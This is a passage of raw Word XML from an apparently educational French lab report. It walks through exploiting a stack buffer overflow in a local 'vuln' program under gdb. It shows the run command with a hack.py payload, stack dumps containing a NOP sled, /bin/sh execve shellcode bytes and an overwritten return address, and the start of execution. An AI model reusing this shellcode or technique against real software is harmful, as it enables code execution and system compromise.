        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous lançons de nouveau le programme dans gdb </w:t>
      </w:r>
      <w:r w:rsidR="00130FE0">
        <w:t xml:space="preserve">comme argument le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00130FE0">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00130FE0">
        <w:t xml:space="preserve"> de notre attaque provenant du script hack.py,</w:t>
      </w:r>
      <w:r w:rsidR="00130FE0" w:rsidRPr="00130FE0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00130FE0">
        <w:t xml:space="preserve">et nous retrouvons de nouveau bloqué au niveau de notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00130FE0">
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00130FE0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46552508" w14:textId="77777777" w:rsidR="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C1F918" w14:textId="77777777" w:rsidR="00F47E89" w:rsidRPr="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89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F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) run </w:t>
      </w:r>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$(python2 hack.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297DD26E" w14:textId="77777777" w:rsidR="00F47E89" w:rsidRPr="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89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F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Starting program: /home/kali/Downloads/vuln $(python2 hack.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE8F17" w14:textId="77777777" w:rsidR="00F47E89" w:rsidRPr="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89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F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[Thread debugging using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C449FB" w14:textId="77777777" w:rsidR="00F47E89" w:rsidRPr="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89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F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Using host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library "/lib/x86_64-linux-gnu/libthread_db.so.1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F572036" w14:textId="77777777" w:rsidR="00F47E89" w:rsidRPr="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89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</w:p>
    <w:p w14:paraId="7C7BA589" w14:textId="77777777" w:rsidR="00F47E89" w:rsidRPr="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89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F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Breakpoint 1, vuln (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=0xffffd2b6 '\220' &lt;repeats 200 times&gt;...) at vuln.c:6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B57FE1" w14:textId="2E8A6498" w:rsidR="00F47E89" w:rsidRPr="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89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F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6           </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F47E89">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer, arg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1CF36" w14:textId="77777777" w:rsidR="00F47E89" w:rsidRDefault="00F47E89" w:rsidP="00F47E89">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF2E009" w14:textId="32BF0F2A" w:rsidR="00F47E89" w:rsidRDefault="000119E0" w:rsidP="00F47E89">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous comparons le contenu de la stack avant et après </w:t>
      </w:r>
      <w:r w:rsidR="00FA03B1">
        <w:t xml:space="preserve">l’exécution du la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA03B1">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA03B1">
        <w:t xml:space="preserve">, pour nous assurer que le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA03B1">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FA03B1">
        <w:t xml:space="preserve"> de notre attaque s’écrive correctement sur la stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D03A67F" w14:textId="77777777" w:rsidR="00FA03B1" w:rsidRDefault="00FA03B1" w:rsidP="00F47E89">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C312BF3" w14:textId="1E62F1AC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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00835118">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">x/68xw </w:t>
      </w:r>
      <w:r w:rsidR="00D27BF0" w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&amp;buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FC0F3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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffced0:     0xf7fc7424      0xf7ffcff4      0xf7fc76c4      0xf7c18482</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4A028B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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcee0:     0xf7fc7694      0x003055e4      0xffffcf10      0x000182af</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71506749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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcef0:     0xffffcfa4      0xf7fbf780      0xf7c12338      0xf7fbf4a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34973EBA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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf00:     0xffffcf54      0xffffcf50      0x00000003      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E2BEE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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf10:     0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      0xf7c12338      0x565552cb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F81271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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf20:     0xf7c09158      0xf7fbf66c      0xffffcfa4      0x003055e4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E84FBE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835118">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0xffffcf30</w:t>
      </w:r>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:     0xf7c18482      0xf7fd0f14      0xf7c05638      0xffffcfac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C480BEF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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf40:     0xf7ffdba0      0x00000002      0xf7fbfb20      0x00000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FE967C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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf50:     0x00000000      0x00000001      0xf7fbf4a0      0x56555034</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDFD189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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf60:     0x00000020      0xf7ffdc0c      0xffffcfe4      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64766157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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf70:     0xf7ffcff4      0x0000002c      0x00000000      0xffffcfec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C812804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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf80:     0xf7ffdba0      0x00000001      0xf7fbf7b0      0x00000001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E8DA05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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcf90:     0x00000000      0x00000001      0xf7ffda40      0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00F758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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0xffffcfa0:     0x00000000      0xffffffff      0x00000000      0xf7fc7694</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D9274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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcfb0:     0xf7ffd608      0x0000002c      0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E8861C6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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcfc0:     0x00000000      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      0xffffdfde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511BF006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00767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcfd0:     0xf7fc5550      0xf7e20ff4      0xffffd008      </w:t>
      </w:r>
      <w:r w:rsidRPr="00835118">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x5655623e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D40334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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00835118">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BA061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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">7           </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"%s\n", buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169495D0" w14:textId="68C298F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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00D27BF0" w:rsidRPr="00770F13">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x/68xw &amp;buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44079B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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffced0:     0x90909090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</w:p>
    <w:p w14:paraId="15E4A43F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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcee0:     0x90909090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</w:p>
    <w:p w14:paraId="7F7DBDAE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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcef0:     0x90909090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</w:p>
    <w:p w14:paraId="15E2B047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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf00:     0x90909090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</w:p>
    <w:p w14:paraId="34915535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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf10:     0x90909090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</w:p>
    <w:p w14:paraId="467E9BAF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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf20:     0x90909090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</w:p>
    <w:p w14:paraId="022762B8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835118">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xffffcf30</w:t>
      </w:r>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">:     0x90909090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</w:p>
    <w:p w14:paraId="3C02CDAA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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf40:     0x90909090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</w:p>
    <w:p w14:paraId="5298BBAA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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf50:     0x90909090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</w:p>
    <w:p w14:paraId="48644F7C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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf60:     0x90909090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</w:p>
    <w:p w14:paraId="4B4A2302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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf70:     0x90909090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</w:p>
    <w:p w14:paraId="762DF132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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf80:     0x90909090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</w:p>
    <w:p w14:paraId="5B8AF376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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcf90:     0x90909090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  <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x90909090</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CAAF012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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xffffcfa0:     0x90909090      0xb0c03190      0x31db3146      0xeb80cdc9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C8EC8F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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xffffcfb0:     0xc0315b16      0x89074388      0x4389085b      0x8d0bb00c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B27F3E7" w14:textId="77777777" w:rsidR="00000767" w:rsidRPr="00000767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000767">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xffffcfc0:     0x538d084b      0xe880cd0c      0xffffffe5      0x6e69622f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4897AD74" w14:textId="76C4C978" w:rsidR="00FA03B1" w:rsidRPr="00D27BF0" w:rsidRDefault="00000767" w:rsidP="00000767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D27BF0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffcfd0:     0x4e68732f      0x41414141      0x42424242      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27BF0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0xffffcf30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FC368" w14:textId="77777777" w:rsidR="00FA03B1" w:rsidRPr="00D27BF0" w:rsidRDefault="00FA03B1" w:rsidP="00F47E89">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CE625D" w14:textId="37B4E46C" w:rsidR="00FA03B1" w:rsidRPr="00BB1AF0" w:rsidRDefault="00BB1AF0" w:rsidP="00F47E89">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB1AF0">
        <w:t xml:space="preserve">Nous retrouvons bien la suite </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">des instructions NOP, suivi du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et finalement l’adresse </w:t>
      </w:r>
      <w:r w:rsidR="00582E87">
        <w:t xml:space="preserve">de l’instruction que nous souhaitons exécuter. Nous laissons la fonction se terminer pour </w:t>
      </w:r>
      <w:r w:rsidR="00651269">
        <w:t xml:space="preserve">que le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00651269">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00651269">
        <w:t xml:space="preserve"> soit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00651269">
        <w:t>executé</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00651269">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325516D2" w14:textId="77777777" w:rsidR="007E6308" w:rsidRDefault="007E6308" w:rsidP="00885E25">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF35496" w14:textId="38087CA8" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3100D7A8" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Continuing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E27B8" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs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1��F1�1��[1��C��C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F266F99" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                            �</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20940B70" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>��</w:t>
      </w:r>
      <w:r w:rsidRPr="00651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A878CC5" w14:textId="77777777" w:rsidR="00651269" w:rsidRPr="00651269" w:rsidRDefault="00651269" w:rsidP="00651269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651269">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00651269">
